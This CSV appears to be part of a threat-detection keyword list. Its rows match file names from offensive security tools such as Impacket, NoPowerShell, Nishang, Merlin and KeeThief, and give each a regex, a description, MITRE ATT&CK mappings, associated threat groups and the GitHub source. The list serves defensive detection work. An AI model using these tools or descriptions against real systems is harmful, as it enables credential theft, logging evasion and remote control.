"*\GetNetIPAddressCommand.cs",".{0,1000}\\GetNetIPAddressCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15582"
"*\GetNetNeighborCommand.cs",".{0,1000}\\GetNetNeighborCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15583"
"*\Get-NetNTLM.ps1*",".{0,1000}\\Get\-NetNTLM\.ps1.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","0","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","15584"
"*\GetNetRouteCommand.cs",".{0,1000}\\GetNetRouteCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15585"
"*\GetNetTCPConnectionCommand.cs",".{0,1000}\\GetNetTCPConnectionCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15586"
"*\GetNPUsers.exe*",".{0,1000}\\GetNPUsers\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15587"
"*\GetNPUsers.py*",".{0,1000}\\GetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","15588"
"*\GetNPUsers.py*",".{0,1000}\\GetNPUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15589"
"*\getOSandSMBproperties.exe*",".{0,1000}\\getOSandSMBproperties\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15590"
"*\Get-OSTokenInformation.ps1*",".{0,1000}\\Get\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15591"
"*\getPac.exe*",".{0,1000}\\getPac\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15592"
"*\getPac.py*",".{0,1000}\\getPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15593"
"*\Get-PassHints.ps1*",".{0,1000}\\Get\-PassHints\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15594"
"*\GetPasswords.ps1*",".{0,1000}\\GetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15595"
"*\Get-PEHeader.ps1*",".{0,1000}\\Get\-PEHeader\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","15596"
"*\GetProcessCommand.cs",".{0,1000}\\GetProcessCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15597"
"*\GetProcHandleDrv_x64.sys*",".{0,1000}\\GetProcHandleDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","15598"
"*\GetPSDriveCommand.cs",".{0,1000}\\GetPSDriveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15599"
"*\GetRemoteSmbShareCommand.cs",".{0,1000}\\GetRemoteSmbShareCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15600"
"*\Get-ScheduledTaskComHandler.ps1*",".{0,1000}\\Get\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15601"
"*\GetSmbMappingCommand.cs",".{0,1000}\\GetSmbMappingCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15602"
"*\GetSmbShareCommand.cs",".{0,1000}\\GetSmbShareCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15603"
"*\Get-SMBSigning.ps1*",".{0,1000}\\Get\-SMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","15604"
"*\Get-SpoolStatus.ps1*",".{0,1000}\\Get\-SpoolStatus\.ps1.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","15605"
"*\getST.py*",".{0,1000}\\getST\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15606"
"*\getST2.py*",".{0,1000}\\getST\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15607"
"*\Get-TGSCipher.ps1*",".{0,1000}\\Get\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15611"
"*\getTGT.py*",".{0,1000}\\getTGT\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15612"
"*\Get-UnConstrained.ps1*",".{0,1000}\\Get\-UnConstrained\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15613"
"*\GetUserSPNs.py*",".{0,1000}\\GetUserSPNs\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15614"
"*\getvalueregistry.py*",".{0,1000}\\getvalueregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15615"
"*\getvalueregistry.txt*",".{0,1000}\\getvalueregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15616"
"*\GetWebDAVStatus\",".{0,1000}\\GetWebDAVStatus\\","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","15617"
"*\GetWebDAVStatus_x64*",".{0,1000}\\GetWebDAVStatus_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","15618"
"*\GetWhoamiCommand.cs",".{0,1000}\\GetWhoamiCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15619"
"*\GetWinStationCommand.cs",".{0,1000}\\GetWinStationCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15620"
"*\Get-WLAN-Keys.ps1*",".{0,1000}\\Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15621"
"*\Get-WLAN-Keys.ps1*",".{0,1000}\\Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15622"
